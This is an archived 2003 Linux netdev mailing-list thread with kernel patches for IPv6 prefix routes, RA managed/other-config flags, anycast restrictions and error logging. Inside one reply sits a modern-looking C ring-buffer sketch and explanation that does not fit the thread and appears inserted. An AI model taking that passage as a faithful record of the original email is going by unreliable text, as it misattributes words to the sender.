Does that sound OK with you ? > At least, new RTM_xxx should not be restricted to get such flags. That's why I had suggested that we can use RTM_GETLNKINFO with more information, like RTA_IFFLAGS, and other things like stats or whatever. That can be done easily enough and still be functionally complete. I just don't have any idea about this new interface. Is this still a problem ? thanks, - KK From yoshfuji@linux-ipv6.org Thu Jul 17 15:45:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:45:38 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HMjRFl004115 for ; Thu, 17 Jul 2003 15:45:28 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6HMl2Bo013503; Fri, 18 Jul 2003 07:47:02 +0900 Date: Fri, 18 Jul 2003 00:47:01 +0200 (CEST) Message-Id: <20030718.004701.11546819.yoshfuji@linux-ipv6.org> To: krkumar@us.ibm.com Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, yoshfuji@linux-ipv6.org Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.4.21 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <3F17245D.9040806@us.ibm.com> References: <20030718.002209.104303756.yoshfuji@linux-ipv6.org> <3F17245D.9040806@us.ibm.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4149 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: 
netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <3F17245D.9040806@us.ibm.com> (at Thu, 17 Jul 2003 15:34:05 -0700), Krishna Kumar says: > have any knowledge of using this new interface. If you prefer, I can split the > patch for prefix list vs O/M bits so that the former is accepted without any > issues. Someone else can modify the O/M to suit new needs. Does that sound OK > with you ? Yes, please split up the patch. > > At least, new RTM_xxx should not be restricted to get such flags. > > That's why I had suggested that we can use RTM_GETLNKINFO with more information, > like RTA_IFFLAGS, and other things like stats or whatever. That can be done > easily enough and still be functionally complete. I just don't have any idea > about this new interface. > > Is this still a problem ? Hmm, I might miss something. Anyway, it seems we're reaching consensus. --yoshfuji From shemminger@osdl.org Thu Jul 17 16:33:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 16:34:01 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HNXrFl006194 for ; Thu, 17 Jul 2003 16:33:54 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6HNXbI13127; Thu, 17 Jul 2003 16:33:37 -0700 Date: Thu, 17 Jul 2003 16:33:37 -0700 From: Stephen Hemminger To: Gergely Madarasz , Jeff Garzik Cc: netdev@oss.sgi.com Subject: comx drivers in 2.6 Message-Id: <20030717163337.78d123c0.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4150 X-ecartis-version: 
Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev It looks like the comx drivers never got updated for 2.5/2.6. Some obvious issues are: - lots of use of /proc files without setting the owner field. - still using cli/sti - no SMP locking on the linked list (which could be changed to list macros) of hardware and protocols. Just bumped into this while trying to inspect for all the last possible broken usage of net_device structure. It is too far behind to address those issues. From jgarzik@pobox.com Thu Jul 17 16:42:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 16:42:52 -0700 (PDT) Received: from www.linux.org.uk (IDENT:Zg4GfCQZ2hHsbGhjp1FwzLmB9lJu4AKM@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HNgeFl006773 for ; Thu, 17 Jul 2003 16:42:47 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19dIOU-0007ke-8P; Fri, 18 Jul 2003 00:42:38 +0100 Message-ID: <3F173458.6060405@pobox.com> Date: Thu, 17 Jul 2003 19:42:16 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Stephen Hemminger CC: Gergely Madarasz , netdev@oss.sgi.com Subject: Re: comx drivers in 2.6 References: <20030717163337.78d123c0.shemminger@osdl.org> In-Reply-To: <20030717163337.78d123c0.shemminger@osdl.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4151 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Stephen Hemminger wrote: > It looks like the comx drivers never got updated for 2.5/2.6. 
Some > obvious issues are: > - lots of use of /proc files without setting the owner field. > - still using cli/sti > - no SMP locking on the linked list (which could be changed to list macros) > of hardware and protocols. > > Just bumped into this while trying to inspect for all the last possible > broken usage of net_device structure. It is too far behind to address > those issues. Submit a patch to mark these CONFIG_OBSOLETE. AFAIK nobody has cared for most of them since 2.2... (munich is an exception) Jeff From krkumar@us.ibm.com Thu Jul 17 17:39:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 17:40:00 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6I0dgFl009591 for ; Thu, 17 Jul 2003 17:39:50 -0700 Received: from westrelay04.boulder.ibm.com (westrelay04.boulder.ibm.com [9.17.193.32]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6I0coc8242264; Thu, 17 Jul 2003 20:38:50 -0400 Received: from DYN318430.beaverton.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay04.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6I0cjOr184290; Thu, 17 Jul 2003 18:38:49 -0600 Date: Thu, 17 Jul 2003 17:37:18 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: kuznet@ms2.inr.ac.ru, , , , Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.5.73 In-Reply-To: <20030718.004701.11546819.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4152 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > Yes, please split up the patch. Following is the split patch for prefix list and O/M flags. > Anyway, it seems we're reaching consensus. Great! 
Glad we have reached consensus because I am exhausted! Since you have agreed to the above proposal, the prefix list patch has to be applied before the O/M flags patch. I have kept RTM_GETLNKINFO and specified a new option to get the flags information; this can be extended later to add more options for other parameters. Thanks, - KK ------------------- Patch for prefix list against 2.5.73 ------------ diff -ruN linux-2.5.73.org/include/linux/ipv6_route.h test/linux-2.5.73/include/linux/ipv6_route.h --- linux-2.5.73.org/include/linux/ipv6_route.h 2003-06-22 11:32:36.000000000 -0700 +++ test/linux-2.5.73/include/linux/ipv6_route.h 2003-07-17 11:38:23.000000000 -0700 @@ -16,6 +16,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h test/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ test/linux-2.5.73/include/linux/rtnetlink.h 2003-07-17 16:57:52.000000000 -0700 @@ -168,6 +168,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-17 16:59:17.000000000 -0700 @@ -129,7 +129,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct
inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -715,7 +715,7 @@ ift->prefered_lft = tmp_prefered_lft; ift->tstamp = ifp->tstamp; spin_unlock_bh(&ift->lock); - addrconf_dad_start(ift); + addrconf_dad_start(ift, 0); in6_ifa_put(ift); in6_dev_put(idev); out: @@ -1211,7 +1211,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL, NULL); } @@ -1238,7 +1238,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1330,7 +1330,8 @@ } } else if (pinfo->onlink && valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, + RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1378,7 +1379,7 @@ } create = 1; - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1529,7 +1530,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1704,7 +1705,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1943,8 +1944,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | 
RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1958,7 +1958,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1968,7 +1968,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); diff -ruN linux-2.5.73.org/net/ipv6/route.c test/linux-2.5.73/net/ipv6/route.c --- linux-2.5.73.org/net/ipv6/route.c 2003-06-22 11:33:05.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/route.c 2003-07-16 10:42:01.000000000 -0700 @@ -1400,13 +1400,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1487,10 +1494,16 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1638,7 +1651,7 @@ &fl.fl6_dst, &fl.fl6_src, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, 
nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1664,7 +1677,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; -------- Patch for O/M flags against 2.5.73 (dependent on previous patch) ----- diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h test/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ test/linux-2.5.73/include/linux/rtnetlink.h 2003-07-17 16:57:52.000000000 -0700 @@ -47,7 +47,9 @@ #define RTM_DELTFILTER (RTM_BASE+29) #define RTM_GETTFILTER (RTM_BASE+30) -#define RTM_MAX (RTM_BASE+31) +#define RTM_GETLNKINFO (RTM_BASE+34) + +#define RTM_MAX (RTM_GETLNKINFO+1) /* Generic structure for encapsulation of optional route information. @@ -61,6 +63,13 @@ unsigned short rta_type; }; +/* Structure to return per interface device flags */ +struct ifp_if6info +{ + int ifindex; + int flags; +}; + /* Macros to handle rtattributes */ #define RTA_ALIGNTO 4 @@ -331,6 +340,7 @@ IFA_LABEL, IFA_BROADCAST, IFA_ANYCAST, + IFA_IFFLAGS, IFA_CACHEINFO }; diff -ruN linux-2.5.73.org/include/net/if_inet6.h test/linux-2.5.73/include/net/if_inet6.h --- linux-2.5.73.org/include/net/if_inet6.h 2003-06-22 11:33:32.000000000 -0700 +++ test/linux-2.5.73/include/net/if_inet6.h 2003-07-16 17:23:24.000000000 -0700 @@ -17,6 +17,8 @@ #include +#define IF_RA_OTHERCONF 0x80 +#define IF_RA_MANAGED 0x40 #define IF_RA_RCVD 0x20 #define IF_RS_SENT 0x10 diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-17 16:59:17.000000000 -0700 @@ -2451,6 +2451,43 @@ netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC); } +int
inet6_dump_linkinfo(struct sk_buff *skb, struct netlink_callback *cb) +{ + int ifindex, flags; + struct net_device *dev; + struct inet6_dev *idev; + struct nlmsghdr *nlh; + struct ifp_if6info ifp, *input_ifp = NLMSG_DATA(cb->nlh); + unsigned char *org_tail = skb->tail; + + ifindex = input_ifp->ifindex; + if ((dev = dev_get_by_index(ifindex)) == NULL) + goto out; + if ((idev = in6_dev_get(dev)) != NULL) { + flags = idev->if_flags; + in6_dev_put(idev); + } else + flags = 0; + dev_put(dev); + + nlh = NLMSG_PUT(skb, NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq, + RTM_GETLNKINFO, sizeof(*input_ifp)); + ifp.flags = flags; + ifp.ifindex = ifindex; /* duplicate info for user to verify */ + RTA_PUT(skb, IFA_IFFLAGS, sizeof(ifp), &ifp); + + nlh->nlmsg_len = skb->tail - org_tail; + return skb->len; + +nlmsg_failure: +rtattr_failure: + printk(KERN_INFO "inet6_dump_linkinfo:skb size not enough\n"); + skb_trim(skb, org_tail - skb->data); + +out: + return -1; +} + static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = { [RTM_NEWADDR - RTM_BASE] = { .doit = inet6_rtm_newaddr, }, [RTM_DELADDR - RTM_BASE] = { .doit = inet6_rtm_deladdr, }, @@ -2459,6 +2496,7 @@ [RTM_DELROUTE - RTM_BASE] = { .doit = inet6_rtm_delroute, }, [RTM_GETROUTE - RTM_BASE] = { .doit = inet6_rtm_getroute, .dumpit = inet6_dump_fib, }, + [RTM_GETLNKINFO - RTM_BASE] = {.dumpit = inet6_dump_linkinfo, }, }; static void ipv6_ifa_notify(int event, struct inet6_ifaddr *ifp) diff -ruN linux-2.5.73.org/net/ipv6/ndisc.c test/linux-2.5.73/net/ipv6/ndisc.c --- linux-2.5.73.org/net/ipv6/ndisc.c 2003-06-22 11:32:56.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/ndisc.c 2003-07-14 15:06:14.000000000 -0700 @@ -1036,6 +1036,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * received RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ?
+ IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); ------------------------------------------------------------------------ From jmorris@intercode.com.au Thu Jul 17 18:53:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 18:53:44 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:/TOsYz1K6pnXF3wQu8RAZtiMVi3x1Y3Z@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6I1rXFl012989 for ; Thu, 17 Jul 2003 18:53:34 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6I1r6r25445; Fri, 18 Jul 2003 11:53:07 +1000 Date: Fri, 18 Jul 2003 11:53:06 +1000 (EST) From: James Morris To: Jim Keniston cc: Andrew Morton , , , , , , , Subject: Re: [PATCH] [1/2] kernel error reporting (revised) In-Reply-To: <3F16F54C.949A9299@us.ibm.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4153 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Thu, 17 Jul 2003, Jim Keniston wrote: > 3. Given the above, what should the evlog.c caller do when > kernel_error_event_iov() returns -EINPROGRESS? > a. Nothing. Figure the packet will probably get logged. > b. Just to be safe, report it via printk, the same way we report dropped > packets. > We currently do (a). (b) would mean that every event logged from IRQ > context would be cc-ed to printk. I don't think this irq detection logic should be added at all here, let the caller reschedule its logging if running in irq context. 
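A minimal user-space sketch of the idea above, assuming the caller (not the logging routine) is responsible for deferring its logging when it cannot log directly. Everything here is hypothetical and for illustration only: `deferred_log_push`, `deferred_log_pop`, and the fixed-size ring are not part of the evlog patch or of any kernel API, and real kernel code would rely on the kernel's own deferral and locking facilities rather than this plain ring buffer.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical names throughout: a user-space analogy, not kernel API. */
#define DEFERRED_LOG_SLOTS  8
#define DEFERRED_LOG_MSGLEN 64

struct deferred_log {
	char msg[DEFERRED_LOG_SLOTS][DEFERRED_LOG_MSGLEN];
	size_t head;    /* oldest queued message */
	size_t count;   /* number of queued messages */
	size_t dropped; /* messages rejected because the ring was full */
};

void deferred_log_init(struct deferred_log *q)
{
	memset(q, 0, sizeof(*q));
}

/*
 * Called from the side that must not log directly (the "IRQ" side).
 * It only copies the message into a free slot; nothing is logged here.
 * Returns 0 on success, -1 if the ring is full.
 * No locking is done in this sketch; a real implementation would need it.
 */
int deferred_log_push(struct deferred_log *q, const char *msg)
{
	size_t slot;

	assert(q != NULL && msg != NULL);
	if (q->count == DEFERRED_LOG_SLOTS) {
		q->dropped++;
		return -1;
	}
	slot = (q->head + q->count) % DEFERRED_LOG_SLOTS;
	strncpy(q->msg[slot], msg, DEFERRED_LOG_MSGLEN - 1);
	q->msg[slot][DEFERRED_LOG_MSGLEN - 1] = '\0';
	q->count++;
	return 0;
}

/*
 * Called later from a context where logging is safe.
 * Copies the oldest queued message into out and returns 1,
 * or returns 0 if nothing is queued.
 */
int deferred_log_pop(struct deferred_log *q, char *out, size_t outlen)
{
	assert(q != NULL && out != NULL);
	if (q->count == 0 || outlen == 0)
		return 0;
	strncpy(out, q->msg[q->head], outlen - 1);
	out[outlen - 1] = '\0';
	q->head = (q->head + 1) % DEFERRED_LOG_SLOTS;
	q->count--;
	return 1;
}
```

In this sketch the non-logging side only ever calls `deferred_log_push()`. A later pass, running where logging is safe, calls `deferred_log_pop()` in a loop and hands each message to whatever logging call is in use. A full ring is counted in `dropped` instead of being logged from the wrong context.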
- James -- James Morris From pekkas@netcore.fi Thu Jul 17 23:53:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 23:53:22 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6I6r4Fl022740 for ; Thu, 17 Jul 2003 23:53:05 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6I6iln15420; Fri, 18 Jul 2003 09:44:47 +0300 Date: Fri, 18 Jul 2003 09:44:46 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: Mika Liljeberg , , , , Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast In-Reply-To: <200307172052.AAA15032@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4154 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 18 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > No user should be able to join anycast group, IMHO. > > OK. Done, the patch enclosed. Based on a quick glance, looks OK. Better than the code we have now.. > Another rfc question: is random delay answering solicitations for > anycast not required already? I'm not sure whether this is what you're asking but..: When responding to an NS with an NA w/ anycast address, the response SHOULD be delayed by a random 0..MAX_ANYCAST_DELAY_TIME (1 by default) seconds. (Override bit also SHOULD be set to 0.) > # This is a BitKeeper generated patch for the following project: > # Project Name: Linux kernel tree > # This patch format is intended for GNU patch command version 2.5 or higher. 
> # This patch includes the following deltas: > # ChangeSet 1.1469 -> 1.1470 > # net/ipv6/anycast.c 1.5 -> 1.6 > # include/net/ip6_route.h 1.10 -> 1.11 > # net/ipv6/icmp.c 1.36 -> 1.37 > # net/ipv6/tcp_ipv6.c 1.64 -> 1.65 > # net/ipv6/ndisc.c 1.52 -> 1.53 > # net/ipv6/route.c 1.50 -> 1.51 > # include/net/ipv6.h 1.22 -> 1.23 > # net/ipv6/addrconf.c 1.58 -> 1.59 > # > # The following is the BitKeeper ChangeSet Log > # -------------------------------------------- > # 03/07/18 kuznet@oops.inr.ac.ru 1.1470 > # IPv6: sanitize anycast address support > # -------------------------------------------- > # > diff -Nru a/include/net/ip6_route.h b/include/net/ip6_route.h > --- a/include/net/ip6_route.h Fri Jul 18 00:49:43 2003 > +++ b/include/net/ip6_route.h Fri Jul 18 00:49:43 2003 > @@ -45,7 +45,8 @@ > void *rtattr); > > extern int ip6_rt_addr_add(struct in6_addr *addr, > - struct net_device *dev); > + struct net_device *dev, > + int anycast); > > extern int ip6_rt_addr_del(struct in6_addr *addr, > struct net_device *dev); > @@ -116,6 +117,13 @@ > np->daddr_cache = daddr; > np->dst_cookie = rt->rt6i_node ? 
rt->rt6i_node->fn_sernum : 0; > write_unlock(&sk->sk_dst_lock); > +} > + > +static inline int ipv6_unicast_destination(struct sk_buff *skb) > +{ > + struct rt6_info *rt = (struct rt6_info *) skb->dst; > + > + return rt->rt6i_flags & RTF_LOCAL; > } > > #endif > diff -Nru a/include/net/ipv6.h b/include/net/ipv6.h > --- a/include/net/ipv6.h Fri Jul 18 00:49:43 2003 > +++ b/include/net/ipv6.h Fri Jul 18 00:49:43 2003 > @@ -51,7 +51,7 @@ > /* > * Addr type > * > - * type - unicast | multicast | anycast > + * type - unicast | multicast > * scope - local | site | global > * v4 - compat > * v4mapped > @@ -63,7 +63,6 @@ > > #define IPV6_ADDR_UNICAST 0x0001U > #define IPV6_ADDR_MULTICAST 0x0002U > -#define IPV6_ADDR_ANYCAST 0x0004U > > #define IPV6_ADDR_LOOPBACK 0x0010U > #define IPV6_ADDR_LINKLOCAL 0x0020U > diff -Nru a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c > --- a/net/ipv6/addrconf.c Fri Jul 18 00:49:43 2003 > +++ b/net/ipv6/addrconf.c Fri Jul 18 00:49:43 2003 > @@ -209,15 +209,8 @@ > }; > return type; > } > - /* check for reserved anycast addresses */ > - > - if ((st & htonl(0xE0000000)) && > - ((addr->s6_addr32[2] == htonl(0xFDFFFFFF) && > - (addr->s6_addr32[3] | htonl(0x7F)) == (u32)~0) || > - (addr->s6_addr32[2] == 0 && addr->s6_addr32[3] == 0))) > - type = IPV6_ADDR_ANYCAST; > - else > - type = IPV6_ADDR_UNICAST; > + > + type = IPV6_ADDR_UNICAST; > > /* Consider all addresses with the first three bits different of > 000 and 111 as finished. 
> @@ -2552,7 +2545,7 @@ > > switch (event) { > case RTM_NEWADDR: > - ip6_rt_addr_add(&ifp->addr, ifp->idev->dev); > + ip6_rt_addr_add(&ifp->addr, ifp->idev->dev, 0); > break; > case RTM_DELADDR: > addrconf_leave_solict(ifp->idev->dev, &ifp->addr); > diff -Nru a/net/ipv6/anycast.c b/net/ipv6/anycast.c > --- a/net/ipv6/anycast.c Fri Jul 18 00:49:43 2003 > +++ b/net/ipv6/anycast.c Fri Jul 18 00:49:43 2003 > @@ -96,7 +96,6 @@ > return onlink; > } > > - > /* > * socket join an anycast group > */ > @@ -110,8 +109,12 @@ > int ishost = !ipv6_devconf.forwarding; > int err = 0; > > + if (!capable(CAP_NET_ADMIN)) > + return -EPERM; > if (ipv6_addr_type(addr) & IPV6_ADDR_MULTICAST) > return -EINVAL; > + if (ipv6_chk_addr(addr, NULL)) > + return -EINVAL; > > pac = sock_kmalloc(sk, sizeof(struct ipv6_ac_socklist), GFP_KERNEL); > if (pac == NULL) > @@ -161,21 +164,12 @@ > * For hosts, allow link-local or matching prefix anycasts. > * This obviates the need for propagating anycast routes while > * still allowing some non-router anycast 